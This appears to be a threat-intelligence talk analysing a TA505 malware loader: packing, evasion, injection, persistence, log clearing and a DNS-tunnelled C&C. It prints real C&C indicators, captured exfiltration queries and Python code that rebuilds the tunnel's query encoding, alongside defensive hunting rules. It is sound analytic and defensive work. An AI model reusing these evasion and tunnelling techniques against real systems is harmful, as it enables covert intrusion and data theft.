![Page 1: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/1.jpg)
ptsecurity.com
Mlw #41: a new sophisticated loader by APT group TA505
Alexey Vishnyakov
• Senior Specialist at Expert Security Center
• Threat Intelligence
• APT analysis
• Incident response support
• Speaker at infosec conferences (PHDays, AVAR)
Twitter: @Vishnyak0v
Agenda
• Intro
• PE packer
• Prep stage
• Persistence stage
• Payload stage
• C&C plugin stage
• Conclusion
Intro
A few words about the group and the sample
Intro
TA505 cybercriminal group
• Since 2014
• More than half of the world targeted
• Huge toolkit: Dridex, Locky, ServHelper and dozens of other families
• Relations with other threat actors: Buhtrap, Silence
Intro
APT?
Sometimes … yes
Intro
• File size: 287440 bytes
• PE32 executable for MS Windows (console) Intel 80386 32-bit
• Microsoft Visual C++
• MD5: 58a875aeaa00ddb684349446ec9d36af
• SHA1: f6d3545a962e88e31365d9218460381d5265025d
• SHA256: d19a8ebbcd0dd9f1f438ac04d510270a135ba4c0c59f3f5eb92ae7e4ea5d8f71
• Imphash: e58e198778a2bd20fd323a8924987ccf
• SSDEEP: 6144:7xohcLcBrQsCSQ+Rd1f4kdn6PAScLl14aG3wUhJzM6rG8mb7+:7s5+sCcLdKM/6r3mbq
PE packer
First part: TA505-related packer
PE packer
Useless instructions before the main logic
PE packer
“SUB-XOR-ROL7-XOR” decoding routine
PE packer
Shellcode execution
struct ShellcodeArgs {
HMODULE hkernel32;
void *aEncodedBlob;
unsigned int nEncodedBlobSize;
unsigned int nBlobMagic;
unsigned int nBlobSize;
};
PE packer
Second stage shellcode at the beginning
PE packer
Payload reduction “from 5 to 3 bytes”
“SUB-XOR-ROL7-XOR” decoding again
PE packer
aPLib decompression (see the FSG packer)
PE packer
Replacement of its own entry point in the PEB
PE packer
Second part: custom packer
PE packer
C:\_SHARED\mlw41_DNSG\c_drop\Release\c_drop.pdb
PE packer
Custom XOR-based algorithm
PE packer
LZNT1 decompression
Compressed PE
Prep stage
Reconnaissance, DLL imports, configuration
Prep stage
Self name: pld32.dll
One exported function for
relocation purposes
Prep stage
Determining the OS version by reading the KUSER_SHARED_DATA structure (no API call needed)
Prep stage
https://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/kuser_shared_data/index.htm
Prep stage
Byte array: function offsets (syscall indexes) in the SDT, selected by OS version
Prep stage
eax == KeServiceDescriptorTable index
Prep stage
How it looked in my VM (syscall numbers differ between Windows builds):

#    2-byte value   API
0    15 00          NtAllocateVirtualMemory
1    1B 00          NtFreeVirtualMemory
2    52 00          NtCreateFile
3    0C 00          NtClose
4    03 00          NtReadFile
5    0E 00          NtQueryInformationFile
6    4F 00          NtResumeThread
7    50 01          NtSetContextThread
8    25 00          NtMapViewOfSection
9    47 00          NtCreateSection
10   34 00          NtOpenSection
11   30 00          NtOpenFile
12   4D 00          NtProtectVirtualMemory
13   33 00          NtQuerySystemInformation
14   3A 00          NtQueryAttributesFile
15   27 00          NtUnmapViewOfSection
Prep stage
FastSysCall in Wow64
Is it x86?
Direct function invocation via syscall
Prep stage
IMHO: quality in the details
Prep stage
Reading auxiliary DLLs from disk via fast syscalls
Prep stage
DLL export table parsing
Prep stage
Function hash calculation algorithm
Prep stage
Resolving function addresses for predefined libraries via hashes
Prep stage
Function hashes
Prep stage
IDA Python script for function resolving, part 1
Table layout: [hash count, hash array, address array]
Prep stage
IDA Python script for function resolving, part 2
Prep stage
Bingo!
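The export-table walk and hash-based resolution described on the preceding slides, as an added stand-alone Python example. This is not the speaker's IDA Python script (which appears only as screenshots) and not the loader's code. Two things are assumptions: the hash function is a ROR13-and-add stand-in, because the loader's real algorithm is shown only as a slide image, and the PE image the resolver walks is constructed inside the block (a minimal mapped PE32 with nothing but an export directory and fake function RVAs), so the example runs offline.

```python
import struct


def u16(buf: bytes, off: int) -> int:
    return struct.unpack_from("<H", buf, off)[0]


def u32(buf: bytes, off: int) -> int:
    return struct.unpack_from("<I", buf, off)[0]


def ror13_hash(name: bytes) -> int:
    """Stand-in API hash (ROR13, then add the byte). ASSUMPTION: the loader's
    real hash on slide 32 is not reproduced here; swap this function for it."""
    h = 0
    for c in name:
        h = (((h >> 13) | (h << 19)) + c) & 0xFFFFFFFF
    return h


def parse_exports(image: bytes) -> dict:
    """Walk IMAGE_EXPORT_DIRECTORY of a mapped PE32 image (RVA == buffer offset)
    and return {export name: function RVA}, going through the ordinal table."""
    if image[:2] != b"MZ":
        raise ValueError("not a PE image")
    e_lfanew = u32(image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad NT signature")
    opt = e_lfanew + 24                 # optional header follows the 20-byte file header
    if u16(image, opt) != 0x10B:
        raise ValueError("only PE32 handled here")
    exp = u32(image, opt + 96)          # DataDirectory[EXPORT].VirtualAddress
    if exp == 0:
        return {}
    num_names = u32(image, exp + 24)    # NumberOfNames
    addr_funcs = u32(image, exp + 28)   # AddressOfFunctions
    addr_names = u32(image, exp + 32)   # AddressOfNames
    addr_ords = u32(image, exp + 36)    # AddressOfNameOrdinals
    exports = {}
    for i in range(num_names):
        name_rva = u32(image, addr_names + 4 * i)
        name = image[name_rva:image.index(b"\0", name_rva)]
        ordinal = u16(image, addr_ords + 2 * i)     # unbiased index into AddressOfFunctions
        exports[name] = u32(image, addr_funcs + 4 * ordinal)
    return exports


def resolve_hashes(image: bytes, hashes: list, hash_fn=ror13_hash) -> list:
    """Fill the loader-style [count, hashes[], addresses[]] table: for every wanted
    hash return (name, RVA), or None when no export hashes to it."""
    by_hash = {}
    for name, rva in parse_exports(image).items():
        by_hash.setdefault(hash_fn(name), (name, rva))
    return [by_hash.get(h) for h in hashes]


def build_image(names: list, dll_name: bytes = b"ntdll.dll") -> bytes:
    """Constructed fixture: minimal mapped PE32 image whose only content is an
    export directory for `names`; function RVAs are fake (0x1000 + 0x100 * index)."""
    img = bytearray(0x1000)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x80)                          # e_lfanew
    img[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", img, 0x84, 0x14C, 0, 0, 0, 0, 224, 0x2102)  # file header
    struct.pack_into("<H", img, 0x98, 0x10B)                         # PE32 magic
    struct.pack_into("<II", img, 0x98 + 96, 0x200, 40)               # export data directory
    n = len(names)
    struct.pack_into("<IIHHIIIIIII", img, 0x200,
                     0, 0, 0, 0, 0x600, 1, n, n, 0x300, 0x400, 0x500)
    img[0x600:0x600 + len(dll_name) + 1] = dll_name + b"\0"
    off = 0x700
    for i, name in enumerate(names):
        struct.pack_into("<I", img, 0x300 + 4 * i, 0x1000 + 0x100 * i)  # AddressOfFunctions[i]
        struct.pack_into("<I", img, 0x400 + 4 * i, off)                 # AddressOfNames[i]
        struct.pack_into("<H", img, 0x500 + 2 * i, i)                   # AddressOfNameOrdinals[i]
        img[off:off + len(name) + 1] = name + b"\0"
        off += len(name) + 1
    return bytes(img)


# Constructed sample image with four exports; real ntdll has thousands.
SAMPLE_IMAGE = build_image([b"NtAllocateVirtualMemory", b"NtClose", b"NtCreateFile", b"NtOpenFile"])
```

Inside IDA the same loop would read the hash array from the database instead of a list and name each slot of the address array after the export it resolves to; the parsing and lookup logic is identical. Note that the resolver keeps the first export for a colliding hash, which is also how a loader that stops at the first match behaves.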
Prep stage
Check the hash of its own file name against a blacklist
Prep stage
Get volume info
Prep stage
Check AV and VM process names
Prep stage
Self compression & encryption
Prep stage
Final recon & configuration structure
Persistence stage
Shellcode, injects, scripts, tasks, anti-DFIR
Persistence stage
Generate an intermediate shellcode
• 420 bytes
• Hardcoded shellcode
• 532 bytes
• Registry path
• Payload size
• Relative addresses of the major ntdll APIs
Persistence stage
Shellcode
Config
Persistence stage
ZwOpenProcess ->
InitializeProcThreadAttributeList ->
UpdateProcThreadAttribute ->
CreateProcessW
Persistence stage
Prepare the thread context with a ROP gadget in ntdll
Persistence stage
Inject via NtSetContextThread with ROP
Persistence stage
Dropping the script onto the system
Persistence stage
Generating the .ps1 launcher
Persistence stage
Finally, execute it
Persistence stage
JScript path construction
Persistence stage
JScript path construction
Persistence stage
Creating the JScript file. What about its MAC times?
Persistence stage
Extracting and assigning MAC timestamps from ntdll (Timestomping)
Persistence stage
AddressBook.js
Persistence stage
Task scheduling via COM interface
Persistence stage
Event log cleaning
Payload stage
Remember?
It’s just a loader…
Payload stage
GUID generation, opening a file mapping
Payload stage
Store the payload on disk and execute or …
Payload stage
… inject in msiexec via NtSetContextThread
Payload stage
… inject with LoadLibraryW, wups.dll and splicing
Payload stage
… inject with LoadLibraryW, wups.dll and splicing
Payload stage
Hooked functions
Payload stage
Encrypt and store a payload in registry
C&C plugin stage
C2 interaction, X25 requests, tunneling
C&C plugin stage
Decrypt and launch the plugin
C&C plugin stage
Seems that’s a real timestamp
C&C plugin stage
Encrypted config structure: “check” bytes, RC4 key, config size, encrypted config
C&C plugin stage
Decrypted config
<a>37.59.52.229</a><b>a12</b><c>zjs4zmhmr2ws</c><d>1</d>
Annotated on the slide: the C&C address and a new RC4 key
C&C plugin stage
Base64 encoding
C&C plugin stage
Symbols replaced in the request (the base64 characters that cannot appear in a hostname)
'+' -> -11P || -22L
'/' -> -33S || -44L
'=' -> -55E || -66Q || -77A || -88L || -99S
C&C plugin stage
Divide the data into chunks, split via dots
C&C plugin stage
MD5 checksum generation and custom base64 encoding
C&C plugin stage
Domain name generation:
/[a-z]{2}[0-9]{2}\.com/
C&C plugin stage
Header packet structure, 18 (0x12) bytes: 4 + 1 + 1 + 4 + 4 + 4
#pragma pack(push, 1)
struct PacketHeader {
DWORD rand; // rand(0xAAAABBBB) + 0x11111111
BYTE num; // sequence number
BYTE zero; // usually zero, unknown
DWORD xored_volume_info; // volume_info ^ rand
DWORD xored_chunks; // chunks ^ rand
DWORD rand2; // usually the same rand as above
};
#pragma pack(pop)
C&C plugin stage
Hardcoded UDP request structure
C&C plugin stage
X25 DNS request type (QTYPE 19)
C&C plugin stage
70FLQwcAqHfxh-11PlBS0PvQUtD.ol68.com
ivMAAAEAzcW6xIrzAACK8wAA.ol68.com
C&C plugin stage
Full query carrying a payload chunk (one DNS name, wrapped over several lines on the slide; every label stays within the 63-character DNS limit):
7ZWPrs2G1tlcONzJnd68Kfb73DYaa0dOB68Dq5djUoy9UABYdFhtAeAaTW-22Lr.1AjwSkBXvVhSlW31sveIvBTvk1TUHtcS6MRj87VIKkXTlQyFLTcP5Ck0FX-11P.irbmr-11PhFWVXcPj2BjkAzRWryseAaDlLajqH7kjXjE4Y7fn4RIt-44LswTTX.BZwPrcF-44LbLn5ZcgT.ySADOwjSjha5-44L8kgAzvaIeJi.ol68.com
The slide annotates two parts of the name: the header and the payload chunk.
C&C plugin stage
…
C&C plugin stage
• Get all 6 chunks
• Join them “as is”
• Custom base64 decode
• RC4 decrypt
• Done!
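The reassembly procedure above, written out as an added example in Python (this is not the talk's code and not the loader's). Everything not on the slides is an assumption and is marked as such in the code: the custom base64 alphabet (a placeholder permutation; the real one has to be lifted from the sample), the RC4 key, the query layout (first label = PacketHeader, remaining labels before the C&C domain = chunk text), and the sample payload. The "-NNX" sequences visible in the real queries are not modelled. The sender side is included only so the receiver can be checked against known input; it also builds the follow-up query that carries the MD5 of the recovered payload.

```python
"""DNS-tunnel chunk reassembly as described in the talk (added example, not the
loader's or the author's code).

ASSUMPTIONS not on the slides: the custom base64 alphabet (placeholder below),
the RC4 key, the query layout (first label = PacketHeader, remaining labels
before the domain = chunk text) and all sample data."""
import base64
import hashlib
import struct

STD = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
# ASSUMPTION: placeholder alphabet; recover the real one from the sample.
CUSTOM = STD[26:52] + STD[:26] + STD[52:62] + "-_"
TO_STD, FROM_STD = str.maketrans(CUSTOM, STD), str.maketrans(STD, CUSTOM)

RC4_KEY = b"example-key"      # ASSUMPTION: stands in for the loader's derived key
C2_DOMAIN = "ol68.com"         # from the slides; matches /[a-z]{2}[0-9]{2}\.com/
HEADER_FMT = "<IBBIII"         # PacketHeader from the slide: 18 bytes, packed
HEADER_LEN = struct.calcsize(HEADER_FMT)
MAX_LABEL, MAX_NAME = 63, 253  # RFC 1035 limits; the real queries respect them


def b64_custom_encode(data: bytes) -> str:
    return base64.b64encode(data).decode().rstrip("=").translate(FROM_STD)


def b64_custom_decode(text: str) -> bytes:
    text = text.translate(TO_STD)
    return base64.b64decode(text + "=" * (-len(text) % 4))


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def build_header(rand: int, seq: int, volume_info: int, chunks: int) -> bytes:
    # rand; num; zero; volume_info ^ rand; chunks ^ rand; rand again
    return struct.pack(HEADER_FMT, rand, seq, 0, volume_info ^ rand, chunks ^ rand, rand)


def parse_header(raw: bytes) -> dict:
    rand, seq, zero, xv, xc, rand2 = struct.unpack(HEADER_FMT, raw[:HEADER_LEN])
    if rand != rand2:
        raise ValueError("trailing rand mismatch: not a header, or wrong alphabet")
    return {"rand": rand, "seq": seq, "zero": zero,
            "volume_info": xv ^ rand, "chunks": xc ^ rand}


def build_queries(payload: bytes, rand: int, volume_info: int, n_chunks: int = 6) -> list:
    """Sender side: RC4 -> custom base64 -> split the TEXT into n_chunks pieces."""
    encoded = b64_custom_encode(rc4(RC4_KEY, payload))
    size = -(-len(encoded) // n_chunks)  # ceiling division
    queries = []
    for seq in range(n_chunks):
        piece = encoded[seq * size:(seq + 1) * size]
        header = b64_custom_encode(build_header(rand, seq, volume_info, n_chunks))
        labels = [piece[i:i + MAX_LABEL] for i in range(0, len(piece), MAX_LABEL)]
        name = ".".join([header, *labels, C2_DOMAIN])
        if len(name) > MAX_NAME:
            raise ValueError("query too long; use more chunks")
        queries.append(name)
    return queries


def recover_payload(queries: list) -> bytes:
    """Receiver side, in the order the slide gives: collect all chunks, join them
    as is (ordered by sequence number), custom base64 decode, RC4 decrypt."""
    chunks, expected = {}, None
    for name in queries:
        labels = name.split(".")
        if ".".join(labels[-2:]) != C2_DOMAIN:
            continue
        hdr = parse_header(b64_custom_decode(labels[0]))
        expected = hdr["chunks"] if expected is None else expected
        if hdr["chunks"] != expected:
            raise ValueError("chunk count changed between queries")
        chunks[hdr["seq"]] = "".join(labels[1:-2])
    if expected is None or sorted(chunks) != list(range(expected)):
        raise ValueError(f"have {len(chunks)} of {expected} chunks")
    encoded = "".join(chunks[i] for i in range(expected))
    return rc4(RC4_KEY, b64_custom_decode(encoded))


def payload_md5(payload: bytes) -> bytes:
    return hashlib.md5(payload).digest()


def ack_query(payload: bytes, rand: int, volume_info: int) -> str:
    """Follow-up query carrying the MD5 of the recovered payload."""
    header = b64_custom_encode(build_header(rand, 0, volume_info, 1))
    return ".".join([header, b64_custom_encode(payload_md5(payload)), C2_DOMAIN])


if __name__ == "__main__":
    sample = b"constructed plugin config: c2=ol68.com; interval=60; " * 3  # constructed
    names = build_queries(sample, rand=0x1234ABCD, volume_info=0xDEADBEEF)
    print("\n".join(names))
    assert recover_payload(names) == sample
    print(ack_query(sample, 0x1234ABCD, 0xDEADBEEF))
```

The receiver deliberately reorders by the `num` field rather than by arrival, so resolver retries and reordering do not corrupt the joined text; a mismatch between the leading and trailing `rand` is the cheapest check that a label really is a header in the expected alphabet.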
C&C plugin stage
Two follow-up queries sharing the same header label (each is one DNS name, wrapped on the slide):
Fu-33S2umvUVm44Ezor-44Lrcw6w-88L-55E.FoVHKQklUbP97RaFRykL4c1H.ol68.com
Fu-33S2umvUVm44Ezor-44Lrcw6w-88L-55E.uI6dHQkl-44L7gn2biOnR2l6hdz.ol68.com
C&C plugin stage
… custom base64 decode -> MD5 hash of the payload
Why twice? …
C&C plugin stage
Payload in the response: header, then payload
C&C plugin stage
Malware config: MD5 checksum again
Conclusion
In the end…
Conclusion
Similar one on Twitter
https://twitter.com/vk_intel/status/1177269767297806337
Conclusion
Proofpoint about Snatch
https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader
Conclusion
@tildedennis about Snatch
https://github.com/tildedennis/malware/blob/master/snatch_loader/decrypt_cfg.py
Conclusion
The same key generation
Conclusion
Takeaways or blue team tips
• Everybody loves tasks
• PowerShell/WScript processes and .ps1/.js files on disk
• msiexec and suspended processes
• Integrity control of system libraries (splicing is still alive)
Conclusion
Takeaways or blue team tips
• Control an execution flow? (ROP gadgets -> kBouncer -> JOP)
• Unusual request types and DNS tunneling
• A lightweight, high-quality trojan downloader is a stable trend
APT != targeted attack
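The "unusual request types and DNS tunneling" tip, turned into a concrete hunt as an added example (not from the talk). It scores DNS query log lines on the signals this loader's C&C exposes: the X25 request type, a registered domain matching the generation pattern, labels near the 63-byte maximum, high-entropy subdomain text, and many distinct subdomains from one client to one domain. The log format (tab-separated timestamp, client, query name, query type name) and the benign lines are constructed; the ol68.com names are the ones shown on the slides. Thresholds are starting points to tune against your own traffic, and the registered-domain split (last two labels) is a simplification that ignores public suffixes.

```python
"""Hunting the DNS-tunnelled C&C from the talk in DNS query logs (added example,
not from the talk). Log format (tab-separated: timestamp, client, qname, qtype
name) and benign lines are constructed; the ol68.com names are from the slides."""
import math
import re
from collections import Counter, defaultdict

# X25 is QTYPE 19 (RFC 1183); legitimate clients do not ask for it.
COMMON_QTYPES = {"A", "AAAA", "CNAME", "MX", "NS", "PTR", "SOA", "SRV", "TXT", "HTTPS"}
C2_DOMAIN_RE = re.compile(r"^[a-z]{2}[0-9]{2}\.com$")  # generation pattern from the slides
LONG_LABEL = 40           # the real chunk labels run up to the 63-byte DNS maximum
ENTROPY_MIN_LEN = 32      # do not score entropy on short names ("www", "mail")
ENTROPY_THRESHOLD = 4.0   # bits per character; base64-like text scores well above this
FANOUT_THRESHOLD = 4      # distinct subdomains per (client, registered domain)

LONG_QUERY = ("7ZWPrs2G1tlcONzJnd68Kfb73DYaa0dOB68Dq5djUoy9UABYdFhtAeAaTW-22Lr."
              "1AjwSkBXvVhSlW31sveIvBTvk1TUHtcS6MRj87VIKkXTlQyFLTcP5Ck0FX-11P."
              "irbmr-11PhFWVXcPj2BjkAzRWryseAaDlLajqH7kjXjE4Y7fn4RIt-44LswTTX."
              "BZwPrcF-44LbLn5ZcgT.ySADOwjSjha5-44L8kgAzvaIeJi.ol68.com")

SAMPLE_LOG = [  # constructed lines; the ol68.com names are from the slides
    "1570000000.1\t10.0.0.5\twww.example.com\tA",
    "1570000001.2\t10.0.0.5\tmail.example.com\tMX",
    "1570000002.3\t10.0.0.5\t70FLQwcAqHfxh-11PlBS0PvQUtD.ol68.com\tX25",
    "1570000002.4\t10.0.0.5\tivMAAAEAzcW6xIrzAACK8wAA.ol68.com\tX25",
    "1570000002.5\t10.0.0.5\t" + LONG_QUERY + "\tX25",
    "1570000002.6\t10.0.0.5\tFu-33S2umvUVm44Ezor-44Lrcw6w-88L-55E.FoVHKQklUbP97RaFRykL4c1H.ol68.com\tX25",
    "1570000002.7\t10.0.0.5\tFu-33S2umvUVm44Ezor-44Lrcw6w-88L-55E.uI6dHQkl-44L7gn2biOnR2l6hdz.ol68.com\tX25",
    "1570000003.0\t10.0.0.7\tassets-cdn-0123456789abcdef.example.net\tA",  # benign
]


def entropy(text: str) -> float:
    """Shannon entropy in bits per character."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def split_name(qname: str):
    """(registered domain, subdomain labels); last two labels, no public-suffix list."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:]).lower(), labels[:-2]


def score_query(qname: str, qtype: str) -> list:
    """Per-query reasons; an empty list means nothing stood out."""
    base, sub_labels = split_name(qname)
    sub = "".join(sub_labels)
    reasons = []
    if qtype not in COMMON_QTYPES:
        reasons.append(f"rare qtype {qtype}")
    if C2_DOMAIN_RE.match(base):
        reasons.append("two-letter-two-digit .com domain")
    if sub_labels and max(map(len, sub_labels)) >= LONG_LABEL:
        reasons.append("long label")
    if len(sub) >= ENTROPY_MIN_LEN and entropy(sub) >= ENTROPY_THRESHOLD:
        reasons.append("high-entropy subdomain")
    return reasons


def analyse(lines):
    """Returns ({qname: reasons}, {(client, domain): distinct subdomain count})."""
    flagged, fanout = {}, defaultdict(set)
    for line in lines:
        _ts, client, qname, qtype = line.rstrip("\n").split("\t")
        base, sub_labels = split_name(qname)
        fanout[(client, base)].add(".".join(sub_labels))
        reasons = score_query(qname, qtype)
        if reasons:
            flagged[qname] = reasons
    noisy = {k: len(v) for k, v in fanout.items() if len(v) >= FANOUT_THRESHOLD}
    return flagged, noisy


if __name__ == "__main__":
    flagged, noisy = analyse(SAMPLE_LOG)
    for qname, reasons in flagged.items():
        print(f"{qname[:60]:60} {', '.join(reasons)}")
    for (client, base), n in noisy.items():
        print(f"{client} -> {base}: {n} distinct subdomains")
```

No single signal is decisive on its own (CDNs and anti-spam services also produce long, high-entropy labels), which is why the per-query reasons and the per-client fan-out are returned separately: the X25 request type plus a matching registered domain is already a strong hit, and the fan-out is what turns a handful of odd queries into a tunnel.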